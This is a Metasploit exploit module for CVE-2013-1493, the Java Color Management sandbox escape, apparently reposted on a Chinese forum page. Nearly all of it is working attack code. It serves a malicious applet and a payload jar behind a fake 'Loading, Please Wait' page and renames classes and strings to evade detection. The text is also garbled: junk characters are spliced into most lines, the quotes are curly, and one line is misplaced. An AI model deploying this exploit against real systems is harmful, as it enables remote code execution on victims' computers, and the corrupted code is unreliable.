##9 ?4 j( N& L" t
( M: x5 T: E; B+ Z& v# This file is part of the Metasploit Framework and may be subject to
; Z) V9 }3 k- [& E) G, G7 P$ O# redistribution and commercial restrictions. Please see the Metasploit
" a, M2 i% z8 v0 p5 i6 E# web site for more information on licensing and terms of use.
& g) X6 ~' u* @! I% N: g# http://metasploit.com/
2 n K7 ^2 v7 B/ r1 U3 l o' w##9 c3 ~- r$ t# c0 ?: \
require ‘msf/core’% i! H6 N6 c# a2 F! ~" p7 ~
require ‘rex’
( o" _, R; |; Vclass Metasploit3 < Msf::Exploit::Remote
' B/ h# \& j# L, ]Rank = NormalRanking3 ]3 Y& A9 _( y: ~! E4 a1 y' l
include Msf::Exploit::Remote::HttpServer::HTML. ~. c& |, p l$ I- V, s
include Msf::Exploit::EXE7 I6 d% e! D: v6 w; V( y3 _. c! F
include Msf::Exploit::Remote::BrowserAutopwn
, i( c8 q0 g5 m {autopwn_info({ :javascript => false })
3 ^: t1 O5 }9 q/ R% _4 Xdef initialize( info = {} )% [, V' B8 M- J2 c1 d# m
super( update_info( info,
% |, \( }# m+ X7 V3 V) l2 C‘Name’ => ‘Java CMM Remote Code Execution’,
5 M. h" A: u" m‘Description’ => %q{
' ^( B2 ^. ]9 f1 {# G+ hThis module abuses the Color Management classes from a Java Applet to run) b5 U$ k9 U1 t
arbitrary Java code outside of the sandbox as exploited in the wild in February
" T3 ]: w( a) F5 f3 r/ T; e0 [) fand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
8 X1 @4 M i/ t8 t8 Rand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
/ a( H: E* v* N* m0 ^$ |6 |systems. This exploit doesn’t bypass click-to-play, so the user must accept the java
% z' [$ _$ C3 O" D0 c2 S! Cwarning in order to run the malicious applet.
) ^+ k; @; C* R; C. R6 `4 p. G+ w},$ \. w' s9 e0 G* V9 h6 ^, s
‘License’ => MSF_LICENSE,
& J: ]' y( z$ y* g‘Author’ =>
% y$ S, k. u8 k; w' G2 F5 Y" \9 Y: m'Unknown', # Vulnerability discovery and Exploit
* x ~1 N/ ]5 k'juan vazquez' # Metasploit module (just ported the published exploit)6 }- s9 k* L, H6 q. A6 f
],
- O+ A* ? Y- d1 I‘References’ =>
8 F s/ x3 J) Y. Z: |, \2 q[+ p0 n V/ k- _4 P, g
[ 'CVE', '2013-1493' ],
q3 h; w, P% F: ^1 j[ 'OSVDB', '90737' ],
: v2 u" b. c- a* h* n* Z6 r[ 'BID', '58238' ],
2 ]$ I% d: Z$ v! z4 q- g[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],0 A7 |; m- n, F! B
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
9 a5 L. ~& W* l$ U1 B# o[ 'URL', 'http://pastie.org/pastes/6581034' ]
& o3 C- U1 b3 y/ j3 F9 V r],* Y1 `1 R% L5 X6 ]
‘Platform’ => [ 'win', 'java' ],' B! X: J/ t2 m, A- `0 S
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
: t( Q* H. d* P2 P, C3 d: b( y‘Targets’ =>! ~ j0 z3 p- Q! w
[
7 G5 N1 M6 @( N; ~0 `6 d1 ^# T[ 'Generic (Java Payload)',: f1 W8 p% d. a! d+ h3 @; Y
{
% K9 Z9 S5 B: Q1 z/ T- N'Platform' => 'java',
- f& l1 T e. g, W' d- |0 ~'Arch' => ARCH_JAVA* ]. a y! o: S5 @" s
}" n% d$ T8 @1 w; u8 v
],# \7 |5 G8 C# @, @& h- E
[ 'Windows x86 (Native Payload)',# D5 B2 K3 J# G0 P
{/ D! W R) F- N3 _
'Platform' => 'win',
% C) k; k6 a" y5 A'Arch' => ARCH_X86( q- M1 D0 R7 _+ T' Q
}3 w1 S$ f4 u4 a! p" m' M" j9 L' o
]
' E) W; ^* p/ c4 T; o# u& u],
8 w3 F1 ?+ n0 T4 ^: f/ ]‘‘DisclosureDate’ => ‘Mar 01 2013′% V3 \9 T0 k1 ~7 g7 p( ]4 A
))1 k/ c! h; i/ Z8 l7 M; E
end
6 n( t0 p: N/ p* [; z- A: p o+ Gdef setup0 W- `) R, G* p, \! G
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)& r; S& v2 [$ z1 V; a
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
+ F# D; ^# p6 @! Xpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)8 D/ F9 }% R: t- p! c( H; R
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
3 G) g" x; y' Hpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)+ ?/ g: T* |. z4 B' v
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }* K! E. z3 @, n3 ^+ w% F
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
' f- }$ H6 [8 N5 p6 J! L) E@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
/ o- i& b, _+ y- m6 N& J) O8 S+ b@init_class_name = rand_text_alpha(“Init”.length)6 e- U6 S$ n1 Q2 A+ D
@init_class.gsub!(“Init”, @init_class_name)6 L" X1 t9 X6 Y5 h2 x% F
super! R. Q) D( F0 y5 O
end
2 Y- A) y7 V6 p* L) _. ?def on_request_uri(cli, request)
* [7 c B" L( d7 _( W8 Hprint_status(“handling request for #{request.uri}”)3 s9 k+ }" a, v) j O: u
case request.uri
" _7 w: Q- y' X; i5 ]when /\.jar$/i
9 X+ w/ ]4 I: f3 Wjar = payload.encoded_jar
1 L I0 p) X) k- |jar.add_file(“#{@init_class_name}.class”, @init_class)2 `6 d+ f6 u6 W
jar.add_file(“Leak.class”, @leak_class)
' I& P* f+ ^- f" pjar.add_file(“MyBufferedImage.class”, @buffered_image_class)8 q. J$ G8 u @3 q( c/ f
jar.add_file(“MyColorSpace.class”, @color_space_class)
- Q6 K/ m' z2 R4 X" J! Y- ~DefaultTarget’ => 1,
6 [$ @) Q5 ], T9 E5 Umetasploit_str = rand_text_alpha(“metasploit”.length)
7 O- r$ u! W! e9 Qpayload_str = rand_text_alpha(“payload”.length)
: r- Y' e3 n( J; xjar.entries.each { |entry|
) s# @, {/ M: a. q4 B9 b- R6 B6 W* ~entry.name.gsub!(“metasploit”, metasploit_str)
" ~4 }/ G c: \3 z( `entry.name.gsub!(“Payload”, payload_str)
# B( r! Q* {" |, h }entry.data = entry.data.gsub(“metasploit”, metasploit_str)
/ J5 i) E( J E# c, X/ kentry.data = entry.data.gsub(“Payload”, payload_str)4 w2 I( V3 I7 J1 Z; @
}
! i5 \3 C1 Z# Z" x8 w, J4 R" \jar.build_manifest2 L3 C1 b; d, H5 n& ~- D1 M* s
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
9 B j* c2 N0 l" O1 b4 awhen /\/$/( }; M9 w* R6 {4 j. [
payload = regenerate_payload(cli)2 C/ k3 h4 P. v9 w9 p% F1 w' B* x
if not payload& s* B( r6 U1 i6 p: F' ~, g
print_error(“Failed to generate the payload.”)
1 a& d7 j: H( Hsend_not_found(cli) _0 F! h& M" t: z
return# G3 t9 [# g" u$ n/ _1 X
end. S/ @& ~; j* [# P& \: T$ H
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
1 N: p9 x7 I; ^# T* A: N( M0 `5 telse' d0 U F+ `' D* A6 @+ ~) z
send_redirect(cli, get_resource() + ‘/’, ”) C- N$ J9 d) J4 \/ d/ s
end
) R- t' |1 z- r9 ?5 Bend, `; `" C2 R9 O9 F6 c
def generate_html' l; Y% h+ U! | t9 `4 d
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
# [& O2 C4 i' Nhtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|
" s) R. k& A, Xhtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|5 `9 ?# n. I& t1 A3 Y, W5 Y' Y
html += %Q|</applet></body></html>|
* N) A- |6 c8 i1 ^/ ^. ~2 |return html
* c3 S3 t0 d( Dend
# [/ `- Y8 j# z2 I+ qend5 Q1 [) [- @9 j# r# o
end5 F! E7 ^: v" o+ {4 i G
|
发表于 2013-4-4 17:31:17
收藏
支持
反对